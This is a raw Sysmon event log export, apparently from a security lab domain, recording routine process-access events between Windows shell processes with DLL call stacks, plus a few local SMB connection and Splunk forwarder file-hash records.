09:19:00.739{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.739{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.738{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.738{5EBD8912-79C0-6151-E577-00000000FC01}42967028C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.738{5EBD8912-79C0-6151-E577-00000000FC01}42967028C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.737{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.718{5EBD8912-79C0-6151-E577-00000000FC01}42964848C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+4bfa5|C:\Windows\System32\TwinUI.dll+23084|C:\Windows\System32\TwinUI.dll+23138|C:\Windows\System32\TwinUI.dll+2444f|C:\Windows\System32\TwinUI.dll+22a1d|C:\Windows\System32\TwinUI.dll+22871|C:\Windows\System32\TwinUI.dll+3fb180|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x80000000000000001052021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.718{5EBD8912-79C0-6151-E577-00000000FC01}42964848C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+4bfa5|C:\Windows\System32\TwinUI.dll+230ec|C:\Windows\System32\TwinUI.dll+23125|C:\Windows\System32\TwinUI.dll+2444f|C:\Windows\System32\TwinUI.dll+22a1d|C:\Windows\System32\TwinUI.dll+22871|C:\Windows\System32\TwinUI.dll+3fb180|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 354300x80000000000000001052020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:58.230{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53486-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001052019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:58.229{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53486-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 23542300x80000000000000001052018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.403{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC22514186EE1BB401870AD4499B34CF,SHA256=7EAA7949827F34FD5AEE7125F89532266AA13EB512E0709BA02057CEE02B3A44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980291Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:01.647{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E2D45BF3DF65D6F2BF7C0B2FE12E15,SHA256=619D9335A543734F896C45580E593E2920D044BE53C7E157A42AB69384B3B51A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.786{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\ShutdownUX.dll+175a3|C:\Windows\system32\ShutdownUX.dll+17c86|C:\Windows\system32\ShutdownUX.dll+179ae|C:\Windows\system32\ShutdownUX.dll+bd60|C:\Windows\system32\ShutdownUX.dll+cda0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001052093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.786{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\ShutdownUX.dll+175a3|C:\Windows\system32\ShutdownUX.dll+1798a|C:\Windows\system32\ShutdownUX.dll+bd60|C:\Windows\system32\ShutdownUX.dll+cda0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.786{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\ShutdownUX.dll+175a3|C:\Windows\system32\ShutdownUX.dll+bd1b|C:\Windows\system32\ShutdownUX.dll+cda0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001052091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001052090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001052089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-79C0-6151-E577-00000000FC01}42964848C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001052088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-79C0-6151-E577-00000000FC01}42964848C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001052087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-79C0-6151-E577-00000000FC01}42965564C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-79C0-6151-E577-00000000FC01}42965564C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.639{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 